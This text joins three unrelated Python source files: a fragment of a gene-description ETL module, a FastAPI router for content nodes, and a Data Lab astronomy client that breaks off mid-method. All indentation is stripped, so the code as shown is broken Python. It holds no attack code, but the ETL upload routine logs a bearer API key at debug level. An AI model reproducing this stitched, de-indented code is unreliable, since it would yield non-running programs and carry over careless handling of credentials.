elif annot["TermId"] == "EMAPA:18425":
annot = {key: value for key, value in annot.items()}
annot["TermId"] = "EMAPA_ARTIFICIAL_NODE:99997"
elif annot["TermId"] == "FBbt:00000001":
annot = {key: value for key, value in annot.items()}
annot["TermId"] = "FBbt_ARTIFICIAL_NODE:99999"
# map all annotations to '* stage conceptus' to 'early conceptus'
if early_conceptus_re.match(ontology.label(annot["TermId"])):
annot = {key: value for key, value in annot.items()}
annot["TermId"] = "EMAPA:36473"
else:
ecodes = [annot["ECode"]]
for ecode in ecodes:
logger.debug(ecode)
final_annotation_set.append(GeneDescriptionsETL.create_annotation_record(
annot["geneId"]
if not annot["geneId"].startswith("HGNC:") else "RGD:" + annot["geneId"],
annot["geneSymbol"],
annot["TermId"],
annot["aspect"],
ecode,
data_provider,
qualifier))
@staticmethod
def get_disease_annotations_from_db(data_provider, gd_data_manager, logger):
"""Get Disease Annotations From DB."""
annotations = []
gene_annot_set = Neo4jHelper.run_single_parameter_query(
GeneDescriptionsETL.get_gene_disease_annot_query,
data_provider)
GeneDescriptionsETL.add_annotations(annotations,
gene_annot_set,
data_provider,
DataType.DO,
logger)
feature_annot_set = Neo4jHelper.run_single_parameter_query(
GeneDescriptionsETL.get_feature_disease_annot_query,
data_provider)
allele_do_annot = defaultdict(list)
for feature_annot in feature_annot_set:
if all([feature_annot["geneId"] != annot[0]
for annot in allele_do_annot[(feature_annot["alleleId"],
feature_annot["TermId"])]]):
allele_do_annot[(feature_annot["alleleId"],
feature_annot["TermId"])].append(feature_annot)
# keep only disease annotations through simple entities
# (e.g., alleles related to one gene only)
feature_annot_set = [feature_annots[0] for feature_annots in allele_do_annot.values() if
len(feature_annots) == 1]
GeneDescriptionsETL.add_annotations(annotations,
feature_annot_set,
data_provider,
DataType.DO,
logger)
disease_via_orth_records = Neo4jHelper.run_single_parameter_query(
GeneDescriptionsETL.get_disease_via_orthology_query, data_provider)
for orth_annot in disease_via_orth_records:
annotations.append(GeneDescriptionsETL.create_annotation_record(
gene_id=orth_annot["geneId"],
gene_symbol=orth_annot["geneSymbol"],
term_id=orth_annot["TermId"],
aspect="D",
ecode="DVO",
prvdr=data_provider,
qualifier=""))
return AssociationSetFactory().create_from_assocs(assocs=list(annotations),
ontology=gd_data_manager.do_ontology)
@staticmethod
def get_expression_annotations_from_db(data_provider, gd_data_manager, logger):
"""Get Expression Annotations From DB."""
annotations = []
gene_annot_set = Neo4jHelper.run_single_parameter_query(
GeneDescriptionsETL.get_expression_annotations_query,
data_provider)
GeneDescriptionsETL.add_annotations(annotations,
gene_annot_set,
data_provider,
DataType.EXPR,
logger,
gd_data_manager.expression_ontology)
return AssociationSetFactory().create_from_assocs(
assocs=list(annotations),
ontology=gd_data_manager.expression_ontology)
@staticmethod
def get_best_orthologs_from_db(data_provider):
"""Get Best Orthologs_from_db."""
orthologs_set = Neo4jHelper.run_single_parameter_query(
GeneDescriptionsETL.get_filtered_human_orthologs_query,
data_provider)
genes_orthologs_algos = defaultdict(lambda: defaultdict(int))
best_orthologs = {}
orthologs_info = {}
for ortholog_algo in orthologs_set:
genes_orthologs_algos[ortholog_algo["geneId"]][ortholog_algo["orthoId"]] += 1
if ortholog_algo["orthoId"] not in orthologs_info:
orthologs_info[ortholog_algo["orthoId"]] = (ortholog_algo["orthoSymbol"],
ortholog_algo["orthoName"])
for gene_id in genes_orthologs_algos.keys():
best_orthologs[gene_id] = [[[ortholog_id,
orthologs_info[ortholog_id][0],
orthologs_info[ortholog_id][1]]
for ortholog_id in genes_orthologs_algos[gene_id].keys() if
genes_orthologs_algos[gene_id][ortholog_id] ==
max(genes_orthologs_algos[gene_id].values())], False]
best_orthologs[gene_id][-1] \
= len(best_orthologs[gene_id][0]) != len(genes_orthologs_algos[gene_id].keys())
return best_orthologs
@staticmethod
def upload_files_to_fms(file_path, context_info, data_provider, logger):
"""Upload Files To FMS."""
with open(file_path + ".json", 'rb') as f_json, \
open(file_path + ".txt", 'rb') as f_txt, \
open(file_path + ".tsv", 'rb') as f_tsv:
if context_info.env["GENERATE_REPORTS"] is True:
file_to_upload = {
f"{context_info.env['ALLIANCE_RELEASE']}_GENE-DESCRIPTION-JSON_{data_provider}": f_json,
f"{context_info.env['ALLIANCE_RELEASE']}_GENE-DESCRIPTION-TXT_{data_provider}": f_txt,
f"{context_info.env['ALLIANCE_RELEASE']}_GENE-DESCRIPTION-TSV_{data_provider}": f_tsv}
else:
file_to_upload = {
f"{context_info.env['ALLIANCE_RELEASE']}_GENE-DESCRIPTION-TEST-JSON_{data_provider}": f_json}
headers = {
'Authorization': 'Bearer {}'.format(context_info.env['API_KEY'])
}
logger.debug(file_to_upload)
logger.debug(headers)
logger.debug('Uploading gene description files to FMS %s',
context_info.env['FMS_API_URL'])
response = requests.post(context_info.env['FMS_API_URL'] + '/api/data/submit',
files=file_to_upload,
headers=headers)
logger.info(response.text)
def save_descriptions_report_files(self, data_provider, json_desc_writer, context_info, gd_data_manager):
"""Save Descripitons Report Files."""
release_version = ".".join(context_info.env["ALLIANCE_RELEASE"].split(".")[0:2])
json_desc_writer.overall_properties.species = data_provider
json_desc_writer.overall_properties.release_version = release_version
json_desc_writer.overall_properties.date = self.cur_date
file_name = self.cur_date + "_" + data_provider
file_path = os.path.join("tmp", file_name)
json_desc_writer.write_json(file_path=file_path + ".json",
pretty=True,
include_single_gene_stats=True,
data_manager=gd_data_manager)
json_desc_writer.write_plain_text(file_path=file_path + ".txt")
readme = "This file contains the following fields: gene ID, gene name, and gene description. The gene " \
"descriptions are generated by an algorithm developed by the Alliance that uses highly structured " \
"gene data such as associations to various ontology terms (e.g., Gene Ontology terms) and the " \
"Alliance strict orthology set. The original set of ontology terms that a gene is annotated to may " \
"have been trimmed to an ancestor term in the ontology, in order to balance readability with the " \
"amount of information in the description. The complete set of annotations to any gene in this file " \
"may be found in the relevant data tables on the Alliance gene page."
species = self.etlh.species_lookup_by_data_provider(data_provider)
taxon_id = self.etlh.get_taxon_from_mod(data_provider)
header = create_header(file_type='Gene Descriptions', database_version=context_info.env["ALLIANCE_RELEASE"],
data_format='txt', readme=readme, species=species, taxon_ids='# TaxonIDs:NCBITaxon:' +
taxon_id)
header = "\n".join([line.strip() for line in header.splitlines() if len(line.strip()) != 0])
self.add_header_to_file(file_path=file_path + ".txt", header=header)
json_desc_writer.write_tsv(file_path=file_path + ".tsv")
header = create_header(file_type='Gene Descriptions', database_version=context_info.env["ALLIANCE_RELEASE"],
data_format='tsv', readme=readme, species=species, taxon_ids='# TaxonIDs:NCBITaxon:' +
taxon_id)
header = "\n".join([line.strip() for line in header.splitlines() if len(line.strip()) != 0])
self.add_header_to_file(file_path=file_path + ".tsv", header=header)
if context_info.env["GENERATE_REPORTS"]:
self.upload_files_to_fms(file_path, context_info, data_provider, self.logger)
@staticmethod
def add_header_to_file(file_path, header):
"""Add header to file."""
with open(file_path, 'r') as original:
data = original.read()
with open(file_path, 'w') as modified:
modified.write(header + "\n\n" + data)
|
from typing import Optional
from typing import List
from fastapi import APIRouter, Depends, Body
from models import User, Content, Node, Group, ExternalContent
from routers import get_current_user, admin_only
from schemas import NodeAdd, NodeEdit, NodeFind
#
router = APIRouter()
@router.post("/push_content")
async def push_content(node_id: str = Body(..., embed=True), content_id: str = Body(..., embed=True),
admin: User = Depends(admin_only)):
assert admin is not None
node = await Node.find_one_and_add_to_set(
find={"id": node_id},
data={"contents": Content.ref(content_id)}
)
return node.export()
@router.post("/pull_content")
async def pull_content(node_id: str = Body(..., embed=True), content_id: str = Body(..., embed=True),
admin: User = Depends(admin_only)):
assert admin is not None
node = await Node.find_one_and_pull(
find={"id": node_id},
data={"contents": Content.ref(content_id)}
)
return node.export()
@router.post("/push_external_content")
async def push_external_content(node_id: str = Body(..., embed=True), external_content_id: str = Body(..., embed=True),
admin: User = Depends(admin_only)):
assert admin is not None
node = await Node.find_one_and_add_to_set(
find={"id": node_id},
data={"external_contents": ExternalContent.ref(external_content_id)}
)
return node.export()
@router.post("/pull_external_content")
async def pull_external_content(node_id: str = Body(..., embed=True), external_content_id: str = Body(..., embed=True),
admin: User = Depends(admin_only)):
assert admin is not None
node = await Node.find_one_and_pull(
find={"id": node_id},
data={"external_contents": ExternalContent.ref(external_content_id)}
)
return node.export()
@router.get("/current")
async def current_nodes(current_user: User = Depends(get_current_user)):
groups = await Group.find({"members": current_user})
nodes_ids = [node.id for group in groups for node in group.nodes]
return [node.export() for node in await Node.find({"id": {"$in": nodes_ids}})]
@router.post("/browse", dependencies=[Depends(admin_only)])
async def browse_nodes(find: NodeFind) -> List[Node]:
return await Node.find(find=find.dict(exclude_unset=True))
@router.post("/read", dependencies=[Depends(admin_only)])
async def read_node(find: NodeFind, with_contents: bool = Body(False), with_other_contents: bool = Body(False)):
node = await Node.find_one(find=find.dict(exclude_unset=True))
node_export = node.dict()
if with_contents:
node_export["contents"] = await Content.find({"id": {"$in": [ content.id for content in node.contents ]}})
if with_other_contents:
node_export["other_contents"] = await Content.find({"id": {"$nin": [ content.id for content in node.contents ]}})
return node_export
@router.post("/edit", dependencies=[Depends(admin_only)])
async def edit_node(find: NodeFind, data: NodeEdit):
print("find", find)
print("data", data)
return await Node.find_one_and_set(find=find.dict(exclude_unset=True), data=data.dict(exclude_unset=True))
@router.post("/add", dependencies=[Depends(admin_only)])
async def add_node(data: NodeAdd):
return await Node.insert_one(data=data.dict(exclude_unset=True))
@router.post("/delete", dependencies=[Depends(admin_only)])
async def delete_node(find: NodeFind):
return await Node.delete_one(find=find.dict(exclude_unset=True))
|
#!/usr/bin/env python
#
# DLINTERFACE.PY -- Python interactive interface to the Data Lab services.
#
#from __future__ import print_function
__authors__ = '<NAME> <<EMAIL>>, <NAME> <<EMAIL>>, <NAME> <<EMAIL>>, \
<NAME> <<EMAIL>>, Data Lab <<EMAIL>>'
__version__ = '20170531' # yyyymmdd
"""
Python interactive interface to the Data Lab services.
Import via
.. code-block:: python
from dl.dlinterface import Dlinterface
"""
import os
from subprocess import Popen, PIPE
import time
try:
import ConfigParser
from urllib import quote_plus, urlencode # Python 2
from urllib2 import urlopen, Request # Python 2
from cStringIO import StringIO
except ImportError:
import configparser as ConfigParser # Python 2
from urllib.parse import quote_plus, urlencode # Python 3
from urllib.request import urlopen, Request # Python 3
from io import StringIO
import requests
from io import BytesIO
# std lib imports
import getpass
import xml.etree.ElementTree as ET
import numpy as np
import tempfile
from functools import partial
import warnings
from astropy.utils.exceptions import AstropyWarning
# use this for SIA service for now
from pyvo.dal import sia
# Data Lab Client interfaces
from dl import authClient, storeClient, queryClient
DAEMON_TIMEOUT = 60 # Mount timeout
CAPS_DIR = "../caps" # Capability directory
ANON_TOKEN = "anonymous.0.0.anon_access" # default tokens
# Service URLs
AM_URL = "http://dlsvcs.datalab.noao.edu/auth" # Auth Manager
SM_URL = "http://dlsvcs.datalab.noao.edu/storage" # Storage Manager
QM_URL = "http://dlsvcs.datalab.noao.edu/query" # Query Manager
# SIA service
#SIA_DEF_ACCESS_URL = "http://datalab.noao.edu/sia/smash"
SIA_DEF_ACCESS_URL = "http://datalab.noao.edu/sia"
SIA_DEF_SIZE = 0.0085 # degrees
def getUserName (self):
''' Get the currently logged-in user token. If we haven't logged in
return the anonymous username.
'''
# could also use self.loginuser
_user = self.dl.get("login", "user")
if _user is None or _user == '':
return "anonymous"
else:
return _user
def getUserToken (self):
''' Get the currently logged-in user token. If we haven't logged in
return the anonymous token.
'''
_token = self.dl.get("login", "authtoken")
if _token is None or _token == '':
return ANON_TOKEN
else:
return _token
def checkLogin (self):
''' Check if the user is already logged in. If not, give a warning message
'''
if self.loginstatus != 'loggedin' and self.loginuser != 'anonymous':
print ("You are not currently logged in. Please use dl.login() to do so.")
return False
else:
return True
def areSyncQueriesWorking ():
''' This checks if the Query Manager is returning proper Sync queries.
'''
queryworking = False # dead until proven alive
if queryClient.isAlive() is True:
# Do simple query with timeout
headers = {'Content-Type': 'text/ascii', 'X-DL-AuthToken': ANON_TOKEN}
query = quote_plus('select ra,dec from smash_dr1.object limit 2')
dburl = '%s/query?sql=%s&ofmt=%s&out=%s&async=%s' % (
"http://dlsvcs.datalab.noao.edu/query", query, "csv", None, False)
try:
r = requests.get(dburl, headers=headers, timeout=1)
except:
pass
else:
# Check that the output looks right
if type(r.content) == str and len(r.content.split('\n')) == 4 and r.content[0:6] == 'ra,dec':
queryworking = True
return queryworking
def isTapWorking ():
''' This checks if the TAP service and Tomcat are running.
'''
tapworking = True # True to start and many ways to make it False
# Check if the availability/tables endpoint is working
try:
#request = Request("http://datalab.noao.edu/tap/avail")
request = Request("http://datalab.noao.edu/tap/tables")
response = urlopen(request, timeout=2).read()
# The full read request of tables take a couple seconds, just
# try to get the header
#r = requests.head("http://datalab.noao.edu/tap/tables",timeout=2)
except:
tapworking = False
else:
tapworking = (tapworking if response is not None else False)
# Check if the Tomcat service is responding
try:
request = Request("http://gp01.datalab.noao.edu:8080/")
response = urlopen(request, timeout=1).read()
except:
tapworking = False
else:
tapworking = (tapworking if response is not None else False)
return tapworking
def areLoginsWorking():
''' This checks if the Authentication Manager is returning proper tokens.
'''
authworking = False # dead until proven alive
if authClient.isAlive() is True:
# Do simple token request
url = "http://dlsvcs.datalab.noao.edu/auth/login?"
query_args = {"username": "datalab", "password": "<PASSWORD>",
"profile": "default", "debug": False}
try:
r = requests.get(url, params=query_args, timeout=1)
except:
pass
else:
# Check that the output looks right
response = r.text
if type(r.content) == str and r.content[0:7] == 'datalab':
authworking = True
return authworking
def isListWorking():
''' This checks if the Storage Manager is returning proper list queries:
'''
storeworking = False # dead until proven alive
if storeClient.isAlive() is True:
# Do simple list queries timeout
url = "http://dlsvcs.datalab.noao.edu/storage/ls?name=vos://&format=csv"
try:
r = requests.get(url, headers={'X-DL-AuthToken': ANON_TOKEN}, timeout=1)
except:
pass
else:
# Check that the output looks right
if type(r.content) == str:
storeworking = True
return storeworking
def addFormatMapping(self):
''' Add the format mapping information to the DL object
'''
from collections import OrderedDict
from pandas import read_csv
from astropy.table import Table
from astropy.io.votable import parse_single_table
# map outfmt container types to a tuple:
# (:func:`queryClient.query()` fmt-value, descriptive title,
# processing function for the result string)
mapping = OrderedDict([
('csv' , ('csv', 'CSV formatted table as a string', lambda x: x.getvalue())),
('ascii' , ('ascii', 'Tab-delimited table as a string', lambda x: x.getvalue())),
('array' , ('csv', 'Numpy array', partial(np.loadtxt,unpack=False,skiprows=1,delimiter=','))),
('structarray' , ('csv', 'Numpy structured / record array', partial(np.genfromtxt,dtype=float,delimiter=',',names=True))),
('pandas' , ('csv', 'Pandas dataframe', read_csv)),
('table' , ('csv', 'Astropy Table', partial(Table.read,format='csv'))),
('votable' , ('votable', 'Astropy VOtable', parse_single_table))
])
self.fmtmapping = mapping
def reformatQueryOutput(self, res=None, fmt='csv', verbose=True):
''' Reformat the output of a query based on a format.
'''
# Not enough inputs
if res is None:
print ("Syntax - reformatQueryOutput(dl, results, fmt='csv'")
return ""
# Add the mapping information if not already loaded
if self.fmtmapping is None:
addFormatMapping(self)
mapping = self.fmtmapping
# Check that this format is supported
if fmt not in mapping.keys():
print ("Format %s not supported." % fmt)
return ""
# Convert to the desired format
#s = StringIO(res)
s = BytesIO(res.encode())
output = mapping[fmt][2](s)
if verbose is True:
print ("Returning %s" % mapping[fmt][1])
return output
def convert_vospace_time_to_seconds(str_date):
"""A convenience method that takes a string from a vospace time field and converts it to seconds since epoch.
:param str_date: string to parse into a VOSpace time
:type str_date: str
:return: A datetime object for the provided string date
:rtype: datetime
"""
right = str_date.rfind(":") + 3
mtime = time.mktime(time.strptime(str_date[0:right], '%Y-%m-%dT%H:%M:%S'))
#return mtime - time.mktime(time.gmtime()) + time.mktime(time.localtime()) # returns wrong time zome time
return mtime
def getNodeInfo(self, xnode, lenpathbase, verbose=True):
''' Get information on a node. The input is a "node" element
of a XML ElementTree.
'''
# Gather up all the necessary information for this node
vals = {'uri':'', 'type':'', 'length':'', 'MD5':'',
'target':'', 'date':'', 'ispublic':'', 'caps':'',
'groupread':None, 'groupwrite':None, 'is_public':None,
'name':'', 'verbosename':'', 'size':'', 'permissions':''}
vals['uri'] = xnode.get('uri')
vals['type'] = xnode.get('{http://www.w3.org/2001/XMLSchema-instance}type')
abspathbase = 'vos://datalab.noao!vospace/'+getUserName(self)+'/'
lenabspathbase = len(abspathbase)
vals['name'] = vals['uri'][lenpathbase:]
# Gather more information for verbose output
if verbose is True:
# Loop over properties/accepts/provides/capabilities/nodes
for p in xnode:
if (p.tag.endswith('target') is True):
vals['target'] = p.text
# Loop over "children"
for ch in p:
if (p.tag.endswith('properties') is True) and (len(p) > 0):
churi = ch.get('uri')
n = churi.split('#')[1]
vals[n] = ch.text
if (p.tag.endswith('capabilities') is True) and (len(p) > 0):
churi = ch.get('uri')
cap = churi.split('#')[1]
if vals['caps'] == '':
vals['caps'] = cap
else:
vals['caps'] = vals['caps']+','+cap
# Parse the information a bit more
vals['verbosename'] = vals['name']
if vals['type'] == 'vos:ContainerNode':
vals['verbosename'] += '/'
if vals['type'] == 'vos:LinkNode':
target = vals['target'][lenabspathbase:]
vals['verbosename'] += ' -> /'+target # absolute path
size = vals['length']
if (type(size) is int) or (type(size) is str and size.isdigit() is True):
size = storeClient.sizeof_fmt(int(size))
vals['size'] = size
# Better date
modified_time = convert_vospace_time_to_seconds(vals['date'])
vals['time'] = time.strftime("%d %b %Y %H:%M:%S", time.localtime(modified_time))
# Create the permissions string
perm = []
for i in range(10):
perm.append('-')
perm[1] = 'r'
perm[2] = 'w'
if vals['type'] == "vos:ContainerNode":
perm[0] = 'd'
if vals['type'] == "vos:LinkNode":
perm[0] = 'l'
#if self.props.get('ispublic', "false") == "true":
if vals['ispublic'] == "true":
perm[-3] = 'r'
perm[-2] = '-'
#write_group = self.props.get('groupwrite', '') # MJG
#if write_group != '':
if vals['groupwrite'] != '':
perm[5] = 'w'
#read_group = self.props.get('groupread', '')
#if read_group != '':
if vals['groupread'] != '':
perm[4] = 'r'
vals['permissions'] = ''.join(perm)
# Return the dictionary of values
return vals
def writeAscii(filename, txt):
''' Write data to ASCII file
'''
fd = open(filename,'wb')
fd.write(txt)
fd.flush()
fd.close()
def readAscii(filename):
''' Read in an ASCII file and return the data
'''
if type(filename) is str:
fd = open(filename, 'r')
else:
fd = filename
data = fd.read()
fd.close()
return data
def convertTableToFormat(t,format):
''' Convert Astropy table to a different format using StringIO and write method.
'''
out = StringIO()
t.write(out, format = format)
return out.getvalue()
#class Node:
# '''
# A class to hold node information.
# '''
# def __init__(self, xnode):
# self.uri = None
# self.type = None
# self.length = None
# self.MD5 = None
# self.target = ''
# self.date = ''
# self.groupread = None
# self.groupwrite = None
# self.is_public = None
# self.islocked = None
# self.caps = ''
# self.name = ''
# self.verbosename = ''
# self.size = ''
# self.permissions = ''
#
# def isdir(self):
# ''' Determine if this node is a directory.
# '''
# return (True if self.type == 'vos:ContainerNode' else False)
#
# def islink(self):
# ''' Determine if this node is a link.
# '''
# return (True if self.type == 'vos:LinkNode' else False)
#
# def getPerms(self):
# ''' Get the permissions string.
# '''
# perm = []
# for i in range(10):
# perm.append('-')
# perm[1] = 'r'
# perm[2] = 'w'
# if self.type == "vos:ContainerNode":
# perm[0] = 'd'
# if self.type == "vos:LinkNode":
# perm[0] = 'l'
# #if self.props.get('ispublic', "false") == "true":
# if self.ispublic == "true":
# perm[-3] = 'r'
# perm[-2] = '-'
# #write_group = self.props.get('groupwrite', '') # MJG
# #if write_group != '':
# if self.groupwrite != '':
# perm[5] = 'w'
# #read_group = self.props.get('groupread', '')
# #if read_group != '':
# if self.groupread != '':
# perm[4] = 'r'
# return string.join(perm, '')
class DLInteract:
'''
Main class for Data Lab interactions
'''
def __init__(self):
self.home = '%s/.datalab' % os.path.expanduser('~')
# Check that $HOME/.datalab exists
if not os.path.exists(self.home):
os.makedirs(self.home)
# See if datalab conf file exists
self.config = ConfigParser.RawConfigParser(allow_no_value=True)
if not os.path.exists('%s/dl.conf' % self.home):
self.config.add_section('datalab')
self.config.set('datalab', 'created', time.strftime(
'%Y-%m-%d %H:%M:%S', time.gmtime()))
self.config.add_section('login')
self.config.set('login', 'status', 'loggedout')
self.config.set('login', 'user', '')
self.config.add_section('vospace')
self.config.set('vospace', 'mount', '')
self._write()
else:
self.config.read('%s/dl.conf' % self.home)
# Set script variables
CAPS_DIR = os.getenv('VOSPACE_CAPSDIR', '../caps')
def save(self, section, param, value):
''' Save the configuration file.
'''
if not self.config.has_section(section):
self.config.add_section(section)
self.config.set(section, param, value)
self._write()
def get(self, section, param):
''' Get a value from the configuration file.
'''
return self.config.get(section, param)
def _write(self):
''' Write out the configuration file to disk.
'''
with open('%s/dl.conf' % self.home, 'w') as configfile:
self.config.write(configfile)
#### Main Data Lab Interface Class and method #####
class Dlinterface:
'''
Data Lab python interface super-class with methods for each command.
'''
def __init__(self, verbose=True):
dlinteract = DLInteract()
self.dl = dlinteract
self.loginstatus = "loggedout"
self.loginuser = ""
#self.logintoken = ""
self.verbose = verbose
self.fmtmapping = None
self.qhistory = None
if verbose is True:
print ("Welcome to the Data Lab python interface. Type dl.help() for help.")
'''
Print method, just print the help
'''
def __str__(self):
self.help()
return " "
#### HELP ########
def help(self, command=None):
'''
Print out useful help information on the Data Lab python interface and it's commands.
'''
# Print out general help information
if command is None:
print ("The Data Lab python interface.")
print (" ")
print ("The available commands are:")
print (" ")
print ("dl.help() - Helpful information")
print ("Use dl.help(<command>) for specific help on a command.")
print (" ")
print ("-- Login and authentication --")
print ("dl.login() - Login to the Data Lab")
print ("dl.logout() - Logout of the Data Lab")
print ("dl.status() - Report on the user status")
print ("dl.whoami() - Print the current active user")
print ("dl.servicestatus() - Report on the status of the DL services")
print (" ")
print ("-- File system operations --")
print ("dl.ls() - List a location in Data Lab VOSpace")
print ("dl.get() - Get a file from Data Lab VOSpace")
print ("dl.put() - Put a file into Data Lab VOSpace")
print ("dl.cp() - Copy a file in Data Lab VOSpace")
print ("dl.mv() - Move a file in Data Lab VOSpace")
print ("dl.rm() - Delete a file in Data Lab VOSpace")
print ("dl.mkdir() - Create a directory in Data Lab VOSpace")
print ("dl.rmdir() - Delete a directory in Data Lab VOSpace")
print ("dl.ln() - Link a file in Data Lab VOSpace")
print ("dl.load() - Load data from a local or VOSpace file")
print ("dl.save() - Save data to a local or VOSpace file")
print ("dl.copyurl() - Copy a file from a URL to Data Lab VOSpace")
print (" ")
print ("-- Query and database operations --")
print ("dl.query() - Query a remote data service in the Data Lab")
print ("dl.queryhistory() - List history of queries made")
print ("dl.queryresults() - Get the async query results")
print ("dl.querystatus() - Get an async query job status")
print ("dl.queryprofiles() - List the available query profiles")
print ("dl.schema() - Get information on database schemas")
print ("dl.droptable() - Drop a user MyDB table")
print ("dl.exporttable() - Copy a user MyDB table to a VOSpace CSV file")
print ("dl.listdb() - List the user MyDB tables")
print ("dl.siaquery() - Query a SIA service in the Data Lab")
# Help on a specific command
else:
cmd = getattr(self, command, None)
if cmd is not None:
#print cmd.__doc__
help(cmd)
else:
print ("%s is not a supported command." % command)
def servicestatus(self):
'''
This checks on the status of the DL services.
'''
# Check the Auth Manager
if areLoginsWorking() is True:
print ("Authentication - ALIVE")
else:
print ("Authentication - DEAD")
# Check that SYNC queries are working
if areSyncQueriesWorking() is True:
print ("SYNC queries - ALIVE")
else:
print ("SYNC queries - DEAD")
# Check that ASYNC queries and TAP are working
if isTapWorking() is True:
print ("ASYNC queries - ALIVE")
else:
print ("ASYNC queries - DEAD")
# Check the Storage Manager
if isListWorking() is True:
print ("Storage - ALIVE")
else:
print ("Storage - DEAD")
################################################
# Account Login Tasks
################################################
def login(self, user=None):
'''
Login to Data Lab using username.
Parameters
----------
user : str
The Data lab username. If this is not given, then the user will be
prompted for the information.
Example
-------
.. code-block:: python
Login and give the username,
dl.login('myusername')
Enter password: *******
Welcome to the Data Lab, myusername
or,
dl.login()
Enter user: myusername
Enter password: ******
Welcome to the Data Lab, myusername
'''
# Check if we are already logged in. The 'user' field of the
# configuration contains the currently active user and token,
# however previous logins will have preserved tokens from other
# accounts we may be able to use.
DOLOGIN = True # login by default
# Already logged in
if self.loginstatus == "loggedin":
_user = self.dl.get("login", "user")
# Same username
if user == _user:
# See whether current token is still valid for this user.
_token = self.dl.get("login", "authtoken")
if not authClient.isValidToken (_token):
print ("Current token for User '%s' no longer valid. Please login again." % user)
DOLOGIN = True
else:
DOLOGIN = False
print ("User '%s' is already logged in to the Data Lab" % user)
elif user is None:
DOLOGIN = False
print ("User '%s' is already logged in to the Data Lab" % user)
# Different username
else:
# We're logging in as a different user.
print ("You are currently logged in as user '%s'. Switching to %s." % (_user, user))
DOLOGIN = True
# Not logged in
else:
DOLOGIN = True
# Do the login via the authClient
if DOLOGIN is True:
if user == None or user == '':
user = raw_input('Enter user: ')
if user == 'anonymous':
if self.loginstatus == 'loggedin': # logout previous user first
self.logout(verbose=False)
token = authClient.login('anonymous','')
self.loginuser = user
else:
token = authClient.login(user,getpass.getpass(prompt='Enter password: '))
if not authClient.isValidToken(token):
print ("Invalid user name and/or password provided. Please try again.")
return
else:
self.loginuser = user
print ("Welcome to the Data Lab, %s" % user)
#print "Authentication successful."
self.dl.save("login", "status", "loggedin")
self.dl.save("login", "user", user)
self.dl.save("login", "authtoken", token)
self.dl.save(user, "authtoken", token)
self.loginstatus = "loggedin"
#self.user = user
#self.token = token
return
def logout(self, unmount=None, verbose=True):
'''
Logout out of the Data Lab.
Example
-------
Logout of Data Lab.
.. code-block:: python
dl.logout()
'myusername' is now logged out of the Data Lab
'''
if self.loginstatus == 'loggedout':
print ("No user is currently logged into the Data Lab")
return
else:
token = getUserToken(self)
user, uid, gid, hash = token.strip().split('.', 3)
res = authClient.logout (token)
if res != "OK":
print ("Error: %s" % res)
return
self.dl.save("login", "status", "loggedout")
self.dl.save("login", "user", "")
self.dl.save("login", "authtoken", "")
if verbose is True:
print ("'%s' is now logged out of the Data Lab" % user)
self.loginstatus = "loggedout"
#self.user = ""
#self.token = ""
def status(self):
'''
Print the status of the Data Lab connection.
Example
-------
The "myusername" is logged in.
.. code-block:: python
dl.status()
User myusername is logged into the Data Lab
No user is currently logged in.
.. code-block:: python
dl.status()
No user is currently logged into the Data Lab
'''
if self.loginstatus == "loggedout":
print ("No user is currently logged into the Data Lab")
else:
print ("User %s is logged into the Data Lab" % \
self.dl.get("login", "user"))
def whoami(self):
'''
Print the current active user.
Example
-------
.. code-block:: python
dl.whoami()
myusername
'''
print (getUserName(self))
################################################
# Query Manager Tasks
################################################
def query(self, query=None, qtype='sql', fmt='csv', out=None, async_=False, profile='default', verbose=True, **kw):
'''
Send a query to a remote query service.
Parameters
----------
query : str
The query string that will be passed to the queryClient and then
to the DB query manager. This can either be in the SQL or
ADQL format (specified by the "type" parameter). For example,
.. code-block:: python
'select ra,dec from gaia_dr1.gaia_source limit 3'
qtype : str
The query format, SQL or ADQL. SQL is used by default.
fmt : str
Format of the result to be returned by the query. Permitted values are.
For file output and direct output to python:
* 'csv' the returned result is a comma-separated string that looks like a csv file (newlines at the end of every row)
* 'ascii' same as csv but tab-delimited
* 'votable' result is a string XML-formatted as a VO table
Only for direct output to python:
* 'array' Numpy array
* 'structarray' Numpy structured / record array
* 'pandas' a Pandas data frame
* 'table' in Astropy Table format
Only for file output:
* 'fits' FITS binary table. Only if the results are saved to a file with out=.
* 'hdf5' HDF5 file. Only if the results are saved to a file with out=.
out : str or None
The output name if the results are to be saved to mydb (mydb://tablename), to VOSpace (vos://filename),
or the local file system (file:// and other names with no prefix). The files are in csv format.
async_ : bool
If ``True``, the query is asynchronous, i.e. a job is
submitted to the DB, and a jobID is returned. The jobID
must be then used to check the query's status and to retrieve
the result (when status is ``COMPLETE``). Default is
``False``, i.e. synchroneous query.
``async_`` replaces the previous ``async`` parameter, because ``async``
was promoted to a keyword in Python 3.7. Users of Python versions
prior to 3.7 can continue to use the ``async`` keyword.
Returns
-------
result : str
If ``async_=False`` and ``out`` is not used, then the return value is the result of the query
in the requested format (see ``fmt``). If ``out`` is given then the query result is saved to
a file or mydb. If ``async_=True`` the jobID is returned with which later the asynchronous
query's status can be checked (:func:`dl.querystatus()`), and the result retrieved (see
:func:`dl.queryresults()`.
Example
-------
A simple query returned as a pandas data frame.
.. code-block:: python
data = dl.query('SELECT * from smash_dr1.source LIMIT 100',fmt='pandas')
Returning Pandas dataframe
type(data)
pandas.core.frame.DataFrame
print data['ra'][0:3]
0 103.068355
1 103.071774
2 103.071598
Perform a query and save the results to a table called "table1.txt" in mydb.
.. code::
res = dl.query('SELECT * from smash_dr1.source LIMIT 100',out='mydb://table1.txt')
dl.listmydb()
Perform the same query and save it to a local file.
.. code::
res = dl.query('SELECT * from smash_dr1.source LIMIT 100',out='table1.txt')
ls
table1.txt
'''
# Process optional keyword arguments.
if 'async' in kw:
async_ = kw['async']
# Not enough information input
if (query is None):
print ("Syntax - dl.query(query, qtype='sql|adql', fmt='csv|ascii|array|structarray|pandas|table|votable|fits|hdf5',")
print (" out='', async_=False, profile='default')")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken (self)
# Check if the source file actually exist
if out is not None and not out.startswith('mydb://'):
res = storeClient.ls(token,out,'csv')
if res != '':
print ("'%s' already exists." % out)
return
# Can only use FITS or HDF for file output
if (out is None or out == '') and fmt in ['fits','hdf5']:
print ("Can only use format '%s' for file output." % fmt)
return
# Cannot use pandas, array, structarray for file output
if (out is not None and out != '') and fmt in ['pandas','array','structarray','table']:
print ("Cannot use format '%s' for file output." % fmt)
return
# Use QID to rerun a previous query
if (type(query) is int) or (type(query) is str and query.isdigit() is True):
queryid = int(query)
keys = sorted(self.qhistory.keys())
if ((queryid in keys) is False): # no QID
